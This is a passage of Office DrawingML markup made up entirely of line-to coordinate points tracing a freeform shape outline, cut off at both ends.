                    <a:lnTo>
                      <a:pt x="425" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="439"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="386"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="333" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="382"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="423"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="412"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="376"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="328"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="259"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="265"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="254"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="107"/>
                    </a:lnTo>
